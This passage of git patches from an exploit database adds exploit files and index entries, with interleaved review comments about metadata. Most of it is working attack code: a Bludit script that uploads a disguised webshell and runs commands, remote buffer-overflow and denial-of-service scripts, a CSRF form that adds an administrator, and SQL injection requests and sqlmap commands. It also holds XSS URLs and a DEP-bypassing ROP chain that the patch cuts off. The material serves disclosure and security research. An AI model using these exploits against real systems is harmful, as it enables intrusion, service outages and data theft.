.::\ + + + +[1] Vulnerable GET parameter: notam_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=notam¬am_id=[SQLi] + +[2] Vulnerable GET parameter: airport=[SQLi] +[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi] + +[3] Vulnerable GET parameter: registry_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=plane_info_public®istry_id=[SQLi] + +[4] Vulnerable GET parameter: plane_location=[SQLi] +[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi] + +[5] Vulnerable GET parameter: hub_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi] + +[6] Vulnerable GET parameter: pilot_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi] + +[7] Vulnerable GET parameter: registry_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=plane_info_public®istry_id=[SQLi] + +[8] Vulnerable GET parameter: event_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi] + +[9] Vulnerable GET parameter: tour_id=[SQLi] +[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi] \ No newline at end of file diff --git a/exploits/php/webapps/48568.py b/exploits/php/webapps/48568.py new file mode 100755 index 000000000..556fdcdf8 --- /dev/null +++ b/exploits/php/webapps/48568.py 
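Review bot: Items [3] and [7] are the same finding (`registry_id` on `page=plane_info_public`), so the file documents eight distinct parameters rather than nine, and the duplicate should be dropped. In the PoC lines for [1], [3] and [7] the `&` separator has been lost to entity decoding (`page=notam¬am_id`, `page=plane_info_public®istry_id`), so they no longer agree with the parameter names printed directly above them. The header also gives no remediation or fixed release, so a closing line such as `# Fix: bind every index.php GET parameter through prepared statements (no patched release referenced)` would tell someone triaging an install what to look for.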
@@ -0,0 +1,114 @@ +# Exploit Title: Bludit 3.9.12 - Directory Traversal +# Date: 2020-06-05 +# Exploit Author: Luis Vacacas +# Vendor Homepage: https://www.bludit.com +# Software Link: https://github.com/bludit/bludit +# Version: >= 3.9.12 +# Tested on: Ubuntu 19.10 +# CVE : CVE-2019-16113 + +#!/usr/bin/env python3 +#-*- coding: utf-8 -*- +import requests +import re +import argparse +import random +import string +import base64 +from requests.exceptions import Timeout + + +class Color: + PURPLE = '\033[95m' + CYAN = '\033[96m' + DARKCYAN = '\033[36m' + BLUE = '\033[94m' + GREEN = '\033[92m' + YELLOW = '\033[93m' + RED = '\033[91m' + BOLD = '\033[1m' + UNDERLINE = '\033[4m' + END = '\033[0m' + +banner = base64.b64decode("4pWU4pWXIOKUrCAg4pSsIOKUrOKUjOKUrOKUkOKUrOKUjOKUrOKUkCAg4pWU4pWQ4pWX4pWmIOKVpuKVlOKVl+KVlArilaDilanilZfilIIgIOKUgiDilIIg4pSC4pSC4pSCIOKUgiAgIOKVoOKVkOKVneKVkeKVkeKVkeKVkeKVkeKVkQrilZrilZDilZ3ilLTilIDilJjilJTilIDilJjilIDilLTilJjilLQg4pS0ICAg4pWpICDilZrilanilZ3ilZ3ilZrilZ0KCiBDVkUtMjAxOS0xNjExMyBDeWJlclZhY2EKCg==").decode() + +print(Color.RED + Color.BOLD + "\n\n" + banner + Color.END) + +def get_args(): + parser = argparse.ArgumentParser(description='Bludit RCE Exploit v3.9.2 CVE-2019-16113 \nBy @CyberVaca') + parser.add_argument('-u', dest='url', type=str, required=True, help='Url Bludit') + parser.add_argument('-user', dest='user', type=str,required=True, help='Username') + parser.add_argument('-pass', dest='password', type=str, required=True, help='Password' ) + parser.add_argument('-c', dest='command', type=str, required=True, help='Command to execute' ) + return parser.parse_args() + + + +def randomString(stringLength=8): + letters = string.ascii_lowercase + return ''.join(random.choice(letters) for i in range(stringLength)) + + +def informa(msg): + print (Color.GREEN + "[" + Color.RED + "+" + Color.GREEN + "] " + msg) + +def login(url,username,password): + session = requests.Session() + login_page = session.get(url + "/admin/") + csrf_token = 
re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1) + informa("csrf_token: " + Color.END + csrf_token) + la_cookie = ((login_page.headers['Set-Cookie']).split(";")[0].split("=")[1]) + paramsPost = {"save":"","password":password,"tokenCSRF":csrf_token,"username":username} + headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer": url + "/admin/","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"} + cookies = {"BLUDIT-KEY":la_cookie} + response = session.post(url + "/admin/", data=paramsPost, headers=headers, cookies=cookies, allow_redirects = False) + informa("cookie: " + Color.END + la_cookie) + return(la_cookie) + + +def csrf_logado(url,la_cookie): + session = requests.Session() + headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":url + "/admin/","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"} + cookies = {"BLUDIT-KEY":la_cookie} + response = session.get(url + "/admin/dashboard", headers=headers, cookies=cookies) + token_logado = response.text.split('var tokenCSRF = "')[1].split('"')[0] + informa("csrf_token: " + Color.END + token_logado) + return token_logado + +def subida_shell(url,la_cookie,token_logado,command,webshell): + session = requests.Session() + paramsPost = {"uuid":"../../tmp","tokenCSRF":token_logado} + paramsMultipart = [('images[]', (webshell, "", 'application/octet-stream'))] + headers = 
{"Origin":url,"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":url + "/admin/new-content","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"} + cookies = {"BLUDIT-KEY":la_cookie} + response = session.post(url + "/admin/ajax/upload-images", data=paramsPost, files=paramsMultipart, headers=headers, cookies=cookies) + informa("Uploading " + Color.END + webshell + Color.END) + +def subida_htaccess(url,la_cookie,token_logado): + session = requests.Session() + paramsPost = {"uuid":"../../tmp","tokenCSRF":token_logado} + paramsMultipart = [('images[]', ('.htaccess', "RewriteEngine off\r\nAddType application/x-httpd-php .jpg", 'application/octet-stream'))] + headers = {"Origin":url,"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Referer":url + "/admin/new-content","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"} + cookies = {"BLUDIT-KEY":la_cookie} + response = session.post(url + "/admin/ajax/upload-images", data=paramsPost, files=paramsMultipart, headers=headers, cookies=cookies) + +def trigger_command(url,webshell,command): + session = requests.Session() + headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0","Connection":"close","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate"} + try: + response = session.get(url + "/bl-content/tmp/" + webshell, headers=headers, timeout=1) + except requests.exceptions.ReadTimeout: + pass + informa("Executing command: " + Color.END + command ) + informa("Delete: " + Color.END + ".htaccess") + informa("Delete: " 
+ Color.END + webshell) + + +if __name__ == '__main__': + args = get_args() + webshell = randomString(8) + ".jpg" + la_cookie = login(args.url,args.user,args.password) + token_logado = csrf_logado(args.url,la_cookie) + subida_shell(args.url,la_cookie,token_logado,args.command,webshell) + subida_htaccess(args.url,la_cookie,token_logado) + trigger_command(args.url,webshell,args.command) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1a7e1ec38..d49a0543a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42791,3 +42791,5 @@ id,file,description,date,author,type,platform,port 48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php, 48561,exploits/hardware/webapps/48561.txt,"Kyocera Printer d-COPIA253MF - Directory Traversal (PoC)",2020-06-08,"Hakan Eren ŞAN",webapps,hardware, 48562,exploits/php/webapps/48562.txt,"Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection",2020-06-08,"Pankaj Kumar Thakur",webapps,php, +48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php, +48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php, From 6ec646f7e1df8e5faa786a2fb16c987e1f3d709e Mon Sep 17 00:00:00 2001 
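Review bot: The version metadata contradicts itself, which makes this entry hard to match against an inventory. The title says `Bludit 3.9.12`, the header says `# Version: >= 3.9.12` (which would mark every later release as affected), and the argparse description says `v3.9.2 CVE-2019-16113`. These should be reconciled into one value, for example `# Version: 3.9.2 (per CVE-2019-16113; confirm against the advisory)`. The title's "Directory Traversal" should also be aligned with the "RCE" wording the script itself uses. The `#!/usr/bin/env python3` and coding lines sit below the comment header, so they have no effect on a file committed with mode 100755 and should move to lines 1–2. For responders, the paths the script touches are the useful indicator: an unexpected `.htaccess` or a randomly named `.jpg` under `bl-content/tmp`.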
From: Offensive Security Date: Thu, 11 Jun 2020 05:02:06 +0000 Subject: [PATCH 11/17] DB: 2020-06-11 10 changes to exploits/shellcodes Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC) Sync Breeze Enterprise 10.4.18 - Denial of-Service (PoC) Savant Web Server 3.1 - Denial of-Service (PoC) ALLPlayer 7.5 - Denial of-Service (PoC) 10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR) WinGate 9.4.1.5998 - Insecure Folder Permissions HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin) Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Virtual Airlines Manager 2.6.2 - 'id' SQL Injection --- exploits/multiple/remote/48569.py | 192 ++++++++++++++++++++++++++++++ exploits/php/webapps/48571.txt | 40 +++++++ exploits/php/webapps/48572.txt | 39 ++++++ exploits/php/webapps/48574.txt | 24 ++++ exploits/windows/dos/38079.py | 26 ++++ exploits/windows/dos/43197.py | 8 ++ exploits/windows/dos/43200.py | 33 +++++ exploits/windows/dos/44481.py | 31 +++++ exploits/windows/local/48570.py | 98 +++++++++++++++ exploits/windows/local/48573.txt | 101 ++++++++++++++++ files_exploits.csv | 10 ++ 11 files changed, 602 insertions(+) create mode 100755 exploits/multiple/remote/48569.py create mode 100644 exploits/php/webapps/48571.txt create mode 100644 exploits/php/webapps/48572.txt create mode 100644 exploits/php/webapps/48574.txt create mode 100755 exploits/windows/dos/38079.py create mode 100755 exploits/windows/dos/43197.py create mode 100755 exploits/windows/dos/43200.py create mode 100755 exploits/windows/dos/44481.py create mode 100755 exploits/windows/local/48570.py create mode 100644 exploits/windows/local/48573.txt diff --git a/exploits/multiple/remote/48569.py b/exploits/multiple/remote/48569.py new file mode 100755 index 000000000..279d9ad17 --- /dev/null +++ b/exploits/multiple/remote/48569.py 
@@ -0,0 +1,192 @@ +# Exploit Title: HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC) +# Date: 2020-06-05 +# Exploit Author: hyp3rlinx +# Vendor Homepage: www.rejetto.com +# CVE : CVE-2020-13432 + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.rejetto.com + + +[Product] +HFS Http File Server v2.3m Build 300 + + +[Vulnerability Type] +Remote Buffer Overflow (DoS) + + +[CVE Reference] +CVE-2020-13432 + + +[Security Issue] +rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual +files or folders are used, allows remote attackers to trigger an +invalid-pointer write access violation via concurrent HTTP requests +with a long URI or long HTTP headers like Cookie, User-Agent etc. + +Remote unauthenticated attackers can send concurrent HTTP requests +using an incrementing or specific payload range of junk characters for +values in the URL parameters or HTTP headers sent to the server. This +results in hfs.exe server crash from an invalid pointer write access +violation. + +Requirements: +hfs.exe must have at least one saved virtual file or folder present. +Test using a remote IP and NOT from the same machine (localhost). + +Dump... + +(e4c.3a8): Access violation - code c0000005 (first/second chance not available) +For analysis of this file, run !analyze -v +WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds. +eax=000a1390 ebx=000a138c ecx=006eb188 edx=001b0000 esi=00000000 edi=00000002 +eip=777ef8b4 esp=000a0e0c ebp=000a12cc iopl=0 nv up ei pl nz na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206 +ntdll!RtlpResolveAssemblyStorageMapEntry+0x18: +777ef8b4 53 push ebx +0:000> !load winext/msec +0:000> !exploitable +WARNING: Stack overflow detected. 
The unwound frames are extracted from outside normal stack bounds. +*** WARNING: Unable to verify checksum for hfs.exe +Exploitability Classification: EXPLOITABLE +Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlpResolveAssemblyStorageMapEntry+0x0000000000000018 (Hash=0x7a29717c.0x325e6a71) + +PROCESS_NAME: hfs.exe + +FOLLOWUP_IP: +hfs+8fad7 +0048fad7 8945f0 mov dword ptr [ebp-10h],eax + +WRITE_ADDRESS: 000a0e08 + + +[References] +https://github.com/rejetto/hfs2/releases/tag/v2.4-rc01 + + +[Exploit/POC] +from socket import * +import time,sys + +#HFS HTTP File Server v2.3m build 300. +#Vendor: www.rejetto.com +#Remote Remote Buffer Overflow DoS +#Note: hfs.exe must have at least one saved virtual file or folder on the target +#test using a remote IP and not from the same machine. +#Discovery: hyp3rlinx +#hyp3rlinx.altervista.org +#ISR: ApparitionSec +#========================================================================= +res="" +once=0 +cnt=0 +max_requests=1666 + +def hfs_dos(): + + global ip,port,length,res,once,cnt,max_requests + + cnt+=1 + + length += 1 + payload = "A"*length + + try: + s=socket(AF_INET, SOCK_STREAM) + s.settimeout(2) + s.connect((ip,port)) + ##bof ="HEAD / HTTP/1.1\r\nHost: "+ip+"Cookie: "+payload+"\r\n\r\n" + bof ="HEAD /?mode="+payload+" HTTP/1.1\r\nHost: "+ip+"\r\n\r\n" + s.send(bof.encode("utf-8")) + if once==0: + once+=1 + res = s.recv(128) + if res != "": + print("Targets up please wait...") + if "HFS 2.3m" not in str(res): + print("[!] Non vulnerable HFS version, exiting :(") + exit() + except Exception as e: + if e != None: + if str(e).find("timed out")!=-1: + if res=="": + print("[!] Target is not up or behind a firewall? :(") + exit() + else: + print("[!] 
Done!") + exit() + s.close() + + if cnt == max_requests: + return False + return True + + +def msg(): + print("HFS HTTP File Server v2.3m build 300.") + print("Unauthenticated Remote Buffer Overflow (DoS - PoC)") + print("Virtual HFS saved file or folder required.") + print("Run from a different machine (IP) than the target.") + print("By Hyp3rlinx - ApparitionSec\n") + +if __name__=="__main__": + + length=3 + + if len(sys.argv) != 3: + msg() + print("Usage: , ") + exit() + + ip = sys.argv[1] + port = int(sys.argv[2]) + + msg() + + while True: + if not hfs_dos(): + print("[!] Failed, non vuln version or no virtual files exist :(") + break + + + +[POC Video URL] +https://www.youtube.com/watch?v=qQ-EawfXuWY + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: May 18, 2020 +Vendor reply: May 18, 2020 +Vendor confirm vulnerability: May 19, 2020 +Vendor creates fix: May 20, 2020 +Vendor released new version 2.4 : June 7, 2020 +June 8, 2020 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/php/webapps/48571.txt b/exploits/php/webapps/48571.txt new file mode 100644 index 000000000..e63bf9b0b --- /dev/null +++ b/exploits/php/webapps/48571.txt 
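Review bot: This file is committed as an executable `.py` (mode 100755) but opens with free-form advisory text (`[+] Credits:`, `[Vendor]`, `[Security Issue]` …), so it is not valid Python as stored. The advisory would be better kept as `#` comments or in a `.txt` file, with the script in its own file. The header block also omits the affected and fixed versions even though the body supplies both. Adding `# Version: 2.3m Build 300` and `# Fixed in: 2.4 (see [References])` would let a reader decide whether a host needs upgrading without reading the timeline at the bottom.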
@@ -0,0 +1,40 @@ +# Exploit Title: Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin) +# Google Dork: N/A +# Date: 2020-06-10 +# Exploit Author: Extinction +# Vendor Homepage: https://adikiss.net/ +# Software Link: https://adikiss.net/2014/06/aplikasi-sistem-informasi-pengumuman-kelulusan-online-2/ +# Version: latest +# Tested on: Linux,windows,macOS + +# Description SpearSecurity : +# CSRF vulnerability was discovered in Sistem kelulusan. +# With this vulnerability, authorized users can be added to the system. + +POC: + + + +
+
+
+ +
+ +
+ +
+
+ +
+
+

CODED BY SPEAR-SECURITY

+

Author Extinction

+ + + +#SpearSecurity-ID \ No newline at end of file diff --git a/exploits/php/webapps/48572.txt b/exploits/php/webapps/48572.txt new file mode 100644 index 000000000..0b1ee7974 --- /dev/null +++ b/exploits/php/webapps/48572.txt 
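Review bot: `# Version: latest` is not a version and will mean something different on every later date. The title already says `1.0`, so the header should read `# Version: 1.0`. The description line "authorized users can be added to the system" is ambiguous; from the title it presumably means an administrator account can be added through a forged request, and it should say so. A one-line remediation note such as `# Mitigation: require a per-session anti-CSRF token on the add-admin form` would make the record useful to whoever maintains an affected install.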
@@ -0,0 +1,39 @@ +# Exploit Title: Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) +# Date: 2020-04-17 +# Exploit Author: Mehmet Kelepçe / Gais Cyber Security +# Vendor Homepage: https://www.j2store.org/ +# Software Link: https://www.j2store.org/download.html +# Reference: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html +# Change Log: https://www.j2store.org/download-j2store/j2store-v3-3-3-13.html +# Version: 3.3.11 +# Tested on: Kali Linux - Apache2 +-------------------------------------------------------------------------------- +Detail: +-------------------------------------------------------------------------------- +File: administrator/components/com_j2store/models/products.php +Vulnerable parameter: filter_order_Dir, filter_order + +PoC: +Request: +-------------------------------------------------------------------------------- +POST /joomla/administrator/index.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/joomla/administrator/index.php?option=com_j2store&view=products +Content-Type: application/x-www-form-urlencoded +Content-Length: 312 +Connection: close +Cookie: [COOIKE] +Upgrade-Insecure-Requests: 1 + +option=com_j2store&view=products&task=browse&boxchecked=0&filter_order=[SQLi]&filter_order_Dir=[SQLi]&2d42ab72d5c2716881de5d802d08ca7f=1&search=1&product_type=0&limit=20&since=&until=&productid_from=&productid_to=&pricefrom=&priceto=&sku=&manufacturer_id=&vendor_id=&taxprofile_id=&visible=&limitstart=0 +-------------------------------------------------------------------------------- + + + +sqlmap -r sqli --dbs --risk=3 --level=5 --random-agent -p filter_order_Dir + +-------------------------------------------------------------------------------- \ No newline at end of file 
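Review bot: The header names the affected release (`# Version: 3.3.11`) but not the fixed one, and `# Reference:` and `# Change Log:` carry the same URL, so one of them is redundant. That URL suggests the fix shipped in 3.3.13; if so, state it as `# Fixed in: 3.3.13 (per vendor change log; confirm)`. The request template has a typo in `Cookie: [COOIKE]`, which should read `[COOKIE]`. The detail section lists both `filter_order_Dir` and `filter_order` as vulnerable while the title mentions only the first, so the title should name both parameters or say "multiple".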
diff --git a/exploits/php/webapps/48574.txt b/exploits/php/webapps/48574.txt new file mode 100644 index 000000000..026b70661 --- /dev/null +++ b/exploits/php/webapps/48574.txt @@ -0,0 +1,24 @@ +# Exploit Title: Virtual Airlines Manager 2.6.2 - 'id' SQL Injection +# Date: 2020-06-09 +# Exploit Author: Mosaaed +# Vendor Homepage: http://virtualairlinesmanager.net/ +# Dork: N/A +# Affected Version: 2.6.2 +# Tested on: Ubuntu +# CVE : N/A + +------------------- +xss + +http://localhost/vam/index.php?page=plane_info_public®istry_id=“>< +http://localhost/vam/index.php?page=fleet_public&plane_icao=1“>< +http://localhost/vam/index.php?page=hub&hub_id=1“>< +http://localhost/vam/index.php?page=fleet_public&plane_location=1“>< +http://localhost/vam/index.php?page=event&event_id=1“>< +------------------------- +SQL Injection +sqlmap -u "http://localhost/vam/index.php?page=manual_flight_details&ID=10" -p ID --dbs +sqlmap -u "http://localhost/vam/index.php?page=plane_info_public®istry_id=10" -p registry_id --db +sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_icao=1" -p plane_icao --dbs +sqlmap -u "http://localhost/vam/index.php?page=hub&hub_id=1" -p hub_id --dbs +sqlmap -u "http://localhost/vam/index.php?page=fleet_public&plane_location=1" -p plane_location --dbs \ No newline at end of file diff --git a/exploits/windows/dos/38079.py b/exploits/windows/dos/38079.py new file mode 100755 index 000000000..643b2d324 --- /dev/null +++ b/exploits/windows/dos/38079.py 
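Review bot: The title for 48574.txt does not describe its contents: it says `'id' SQL Injection`, but the first section is headed `xss` and lists five reflected-input URLs. The SQL section covers `ID`, `registry_id`, `plane_icao`, `hub_id` and `plane_location`, not a single `id` parameter. A title such as `Virtual Airlines Manager 2.6.2 - Multiple SQL Injection / Cross-Site Scripting` would let the index row be found by anyone searching for XSS in this product. Three of the SQL parameters (`registry_id`, `hub_id`, `plane_location`) are already recorded in 48567.txt from the previous patch, so the header should cross-reference that entry rather than present them as new.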
@@ -0,0 +1,26 @@ +#!/usr/bin/python +import socket +import sys +from struct import pack + +try: + server = sys.argv[1] + port = 80 + size = 260 + + httpMethod = b"GET /" + inputBuffer = b"\x41" * size + httpEndRequest = b"\r\n\r\n" + + buf = httpMethod + inputBuffer + httpEndRequest + + print("Sending evil buffer...") + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((server, port)) + s.send(buf) + s.close() + + print("Done!") + +except socket.error: + print("Could not connect!") \ No newline at end of file diff --git a/exploits/windows/dos/43197.py b/exploits/windows/dos/43197.py new file mode 100755 index 000000000..b2d92853e --- /dev/null +++ b/exploits/windows/dos/43197.py @@ -0,0 +1,8 @@ +#!/usr/bin/python + +buffer = b"http://" +buffer += b"\x41" * 1500 + +f=open("player.m3u","wb") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/43200.py b/exploits/windows/dos/43200.py new file mode 100755 index 000000000..8e53801bf --- /dev/null +++ b/exploits/windows/dos/43200.py 
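Review bot: 38079.py and 43197.py are added with no header block at all: no title, affected product or version, author, or tested platform. The only identification lives in the `files_exploits.csv` rows, which do not travel with the file. The same applies to 43200.py and 44481.py later in this patch. Each file should open with the standard comment header used by the other entries, filled from its index row, for example `# Exploit Title: Savant Web Server 3.1 - Denial of-Service (PoC)` and `# Exploit Author: DDD004` for 38079.py. In 38079.py, `from struct import pack` is imported but never used in the 26 lines shown and can be removed.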
@@ -0,0 +1,33 @@ +#!/usr/bin/python +import socket +import sys + +try: + server = sys.argv[1] + port = 80 + size = 800 + inputBuffer = b"A" * size + content = b"username=" + inputBuffer + b"&password=A" + + buffer = b"POST /login HTTP/1.1\r\n" + buffer += b"Host: " + server.encode() + b"\r\n" + buffer += b"User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n" + buffer += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" + buffer += b"Accept-Language: en-US,en;q=0.5\r\n" + buffer += b"Referer: http://10.11.0.22/login\r\n" + buffer += b"Connection: close\r\n" + buffer += b"Content-Type: application/x-www-form-urlencoded\r\n" + buffer += b"Content-Length: "+ str(len(content)).encode() + b"\r\n" + buffer += b"\r\n" + buffer += content + + print("Sending evil buffer...") + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((server, port)) + s.send(buffer) + s.close() + + print("Done!") + +except socket.error: + print("Could not connect!") \ No newline at end of file diff --git a/exploits/windows/dos/44481.py b/exploits/windows/dos/44481.py new file mode 100755 index 000000000..3851463d6 --- /dev/null +++ b/exploits/windows/dos/44481.py 
@@ -0,0 +1,31 @@ +#!/usr/bin/python +import socket +import sys +from struct import pack + +try: + server = sys.argv[1] + port = 9121 + size = 1000 + + inputBuffer = b"\x41" * size + + header = b"\x75\x19\xba\xab" + header += b"\x03\x00\x00\x00" + header += b"\x00\x40\x00\x00" + header += pack(' \x20 ; \x0D & \x0A => Truncates buffer +# Recreate: +# Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart +# Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit +# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename +# ------------------------------------------------------------------------------------------- +# 0x12000000 | 0x12057000 | False | True | False | False | False | [ssleay32.dll] +# 0x00400000 | 0x01247000 | False | False | False | False | False | [BandMonitor.exe] +# 0x11000000 | 0x11155000 | False | True | False | False | False | [LIBEAY32.dll] +# ------------------------------------------------------------------------------------------- + +import struct +OS_retSled = '\x41'*400 +retSled = '\x24\x01\x06\x11'*100 #11060124 # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ} +def createRopChain(): + ropGadgets = [ + # HMODULE LoadLibraryA( LPCSTR lpLibFileName); + # $ ==> > 1106905D CALL to LoadLibraryA + # $+4 > 012428B4 FileName = "kernel32.dll" + 0x012126f5, # POP EAX # RETN [BandMonitor.exe] + 0x110e70bc, # kernel32!loadlibrarya [LIBEAY32.dll] + 0x110495ef, # JMP [EAX] [LIBEAY32.dll] + 0x1106905d, # PUSH EAX # POP ESI # RETN [LIBEAY32.dll] + 0x012428B4, # &String = "kernel32.dll\x00" + # EAX&ESI = &kernel32.dll + # FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName); + # $ ==> > 011D53D2 CALL to GetProcAddress + # $+4 > 76C40000 hModule = (KERNEL32) + # $+8 > 0014F6CC ProcNameOrOrdinal = "WinExec" + 0x01226010, # PUSH ESP # AND AL, 
4 # POP ECX # POP EDX # RETN [BandMonitor.exe] - [move esp -> ecx] + 0xfffff2D4, # EDX = Offset2String; ECX = ESP + 0x011d53d2, # xchg eax, ecx # ret [BandMonitor.exe] - eax=esp & ecx = "kernel32.dll\x00" + 0x11061ea7, # sub eax, edx # ret [LIBEAY32.dll]- eax=&String="WinExec\d4" + 0x1106905d, # push eax # pop esi # ret [LIBEAY32.dll] - ESI&EAX="WinExec\d4" + 0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a, + # (INC EAX # RETN)*7 [LIBEAY32.dll] + 0x011f282b, # xor [eax], dl # ret [BandMonitor.exe] - ESI="WinExec\x00" + 0x01203a3b, # xchg eax, esi # ret [BandMonitor.exe] - EAX="WinExec\x00" + 0x11084dca, # xchg eax, edx # ret [LIBEAY32.dll] - EDX="WinExec\x00" + 0x012126f5, # POP EAX # RETN [BandMonitor.exe] + 0x110e708c, # kernel32!getprocaddress [LIBEAY32.dll] + 0x1109cdb9, # mov eax, ds:[eax] # ret [LIBEAY32.dll] - EAX = &GetProcAddress + 0x1106CE04, # mov [esp+8], edx # mov [esp+4], ecx # jmp near eax + 0x011d53d2, # xchg eax, ecx # ret [BandMonitor.exe] - ECX=&KERNEL32.WinExec + 0xffffffff, # NOP - Overwritten by GetProcAddress Stack Setup + 0xffffffff, # NOP - Overwritten by GetProcAddress Stack Setup + # Call WinExec( CmdLine, ShowState ); + # CmdLine = "calc" + # ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window + 0x0106a762, # INC ESI # RETN [BandMonitor.exe] - ESI="calc\x" + 0x01203a3b, # xchg eax, esi # ret [BandMonitor.exe] - EAX="calc\xff" + 0x1106905d, # PUSH EAX # POP ESI # RETN [LIBEAY32.dll] - EAX&ESI="calc\xff" + 0x1107fc8a,0x1107fc8a,0x1107fc8a,0x1107fc8a, # (INC EAX # RETN)*4 [LIBEAY32.dll] + 0x01226014, # POP EDX # RETN [BandMonitor.exe] + 0xffffffff, # dl = 0xff + 0x011f282b, # xor [eax], dl # ret [BandMonitor.exe] - ESI="calc\x00" + 0x01218952, # NEG EDX # RETN [BandMonitor.exe] - EDX=0x01 = SW_SHOWNORMAL + 0x01203a3b, # xchg eax, esi # ret [BandMonitor.exe] - EAX="calc\x00" + 0x1102ce1f, # xchg eax, ecx [LIBEAY32.dll] - ECX="calc\x00" = CmdLine - EAX=&KERNEL32.WinExec + 0x1106CE04, # mov 